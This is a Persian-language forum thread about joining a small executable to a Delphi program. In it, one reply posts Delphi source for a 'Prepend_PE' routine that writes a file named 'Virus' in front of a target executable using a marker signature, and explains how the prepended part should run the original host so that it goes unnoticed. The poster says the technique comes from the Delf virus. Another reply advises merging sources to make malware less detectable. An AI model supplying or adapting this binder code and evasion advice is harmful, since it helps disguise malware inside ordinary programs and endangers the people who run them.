نمایش نتایج 1 تا 9 از 9

نام تاپیک: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

  1. #1
    کاربر دائمی آواتار Zahed2008
    تاریخ عضویت
    آبان 1387
    محل زندگی
    تهران
    پست
    100

    Smile تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام، من یه فایل اجرایی(exe) دارم که می خوام به برنامه خودم که با زبان دلفی نوشته شده تزریق کنم. چی کار کنم؟ ممنون می شم راهنمایی ام کنید.

  2. #2
    کاربر دائمی آواتار MSHService
    تاریخ عضویت
    آذر 1387
    محل زندگی
    اکنون توی EJB
    پست
    207

    نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام رفیق.
    من خودم Inject بلد نیستم! اما یه سورس برات Up کرد ببین به کارت میاد.دوست دارم یاد بگیرم.
    اگه خواستی دوتا exe رو بهم بچسبونی من درخدمتتم.
    http://www.uplod.ir/download.php?file=486176
    موفق باشی.

  3. #3
    کاربر دائمی آواتار Zahed2008
    تاریخ عضویت
    آبان 1387
    محل زندگی
    تهران
    پست
    100

    Smile نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام، شاید منظور من همون چسبوندن بود. چون یکی از exe ها خیلی کوچیک بود گفتم «تزریق». اگه میشه راهنمایی کنید.

  4. #4
    کاربر دائمی آواتار Zahed2008
    تاریخ عضویت
    آبان 1387
    محل زندگی
    تهران
    پست
    100

    Smile نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام. لطفاً منو بیشتر راهنمایی کنید.

  5. #5
    کاربر دائمی آواتار narsic
    تاریخ عضویت
    شهریور 1387
    محل زندگی
    دهکده جهانی
    سن
    35
    پست
    1,020

    نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    با سلام
    از برنامه های Binder استفاده کن .
    به این کار میگن Bind کردن نه Inject .
    اگه یک بدافزار یه طرف قضیه هست و سورس هر دو برنامه رو هم داری سورس رو با هم یکی کن کم تر خودشو نشون میده .
    موفق باشید

  6. #6
    کاربر دائمی آواتار MSHService
    تاریخ عضویت
    آذر 1387
    محل زندگی
    اکنون توی EJB
    پست
    207

    نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام
    یه تابع برات گذاشتم ماله قدیماست.
    این کد فقط چسبوندنه دو تا peاست نه چیزه دیگه.فقط اسمهای متغیر ها بدن.
    فایله ویروس (pe1)می خواد خودش رو به DestinationFileبچسبونه.
    فاصله بین دو فایل با یه Signature که L هست مشخص میشه.
    L : STRING= 'XFEARX';


    Procedure Prepend_PE(Virus,DestinationFile:STRING);
    LABEL
    Abort_Pe;
    Var
    T : STRING;
    myFile : File;
    byteArray : array[1..8] of byte;
    oneByte : byte;
    count : Integer;
    I : WORD;
    F : FILE;
    G : FILE;
    Buffer1 : ARRAY [0..2048] OF Byte;
    Buffer2 : ARRAY [0..2048] OF Byte;
    Buf : ARRAY [1..2048] OF Byte;
    begin
    //DestinationFile:='FileTest\DestinationFile.exe';
    //Virus:='FileTest\Virus.exe';
    T:=LowerCase(L);
    CopyFile(pChar(DestinationFile),pChar(DestinationF ile+'.tmp'),False);
    CopyFile(pChar(Virus),pChar(DestinationFile),False );
    FileMode:=2; //Read And Write
    AssignFile(F,DestinationFile);
    AssignFile(G,DestinationFile+'.tmp');
    Reset(F,1); //open And Definr Block=1 byte// Now we define one record as 1 byte
    IF IOResult<>0 THEN
    Begin
    // ShowMessage('CantOpen DestinationFile File');
    Abort;//Cant pen The File
    End;
    Reset(G,1);
    IF IOResult<>0 THEN
    Begin
    ShowMessage('CantOpen DestinationFile.TMP File');
    Abort;
    End;
    Seek(F,FileSize(F)); //Goto End Of File
    BlockWrite(F,T[1],6);//write 6 byte to F //Write Signature End Of File
    REPEAT
    BlockRead(G,Buf[1],2048,Count);//Read TempFile From Khune 1 ta count //
    BlockWrite(F,Buf[1],Count);//write Into Destination File From 1 To Count //
    UNTIL Count=0;
    CloseFile(G);
    Reset(f, 1);
    while not Eof(f) do
    begin
    BlockRead(f, oneByte, 1); // Read one byte at a time
    end;
    CloseFile(f);
    ShowMessage('Prepend Finished');
    end;
    //---------
    موفق باشید.

  7. #7
    کاربر دائمی
    تاریخ عضویت
    اسفند 1386
    محل زندگی
    تهران
    پست
    2,397

    نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    ظاهرا" میچسبونه ولی قابلیت اجرایی نداره ! درسته ؟

  8. #8
    کاربر دائمی آواتار MSHService
    تاریخ عضویت
    آذر 1387
    محل زندگی
    اکنون توی EJB
    پست
    207

    نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    نقل قول نوشته شده توسط Nima NT مشاهده تاپیک
    ظاهرا" میچسبونه ولی قابلیت اجرایی نداره ! درسته ؟
    سلام
    منظورتون رو نميفهمم!
    رفیق این کد میاد دوتا exe رو بهم میچسبونه و فایله تولیدی قابلیت اجرا داره. حالا برای اجرای PE2 شما باید PE اولیتون(virus) که ابتدا قرار گرفته بعد از اجرا شدن خودش رو تو temp کپی کنه بعد PE2 رو از رو Signatur پیدا کنه و اجرا کنه! طوری که اصلان PE اولی در کار نبوده.
    چون کارمندم و همش ماموریتمو در حاله نصبه ویندوز و عوض کردن پاور و بلور گرفتن داخل کیس هام ،هفت ای یکبار وقت میکنم دلفی باز کنم ،به همین خاطر این کد ها رو یادم رفتن. اینا رو از رو ویروسه Delf یاد گرفتم و ترکیب کردم.

  9. #9
    کاربر دائمی آواتار Zahed2008
    تاریخ عضویت
    آبان 1387
    محل زندگی
    تهران
    پست
    100

    Smile نقل قول: تزریق فایل اجرایی به برنامه نوشته شده با دلفی

    سلام، لطفاً در مورد نحوه پیدا کردن signature اگه کدی دارید، بذارید ممنون می شم. چون به صورت رمز در میاد من نمی تونم پیداش کنم.

برچسب های این تاپیک

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •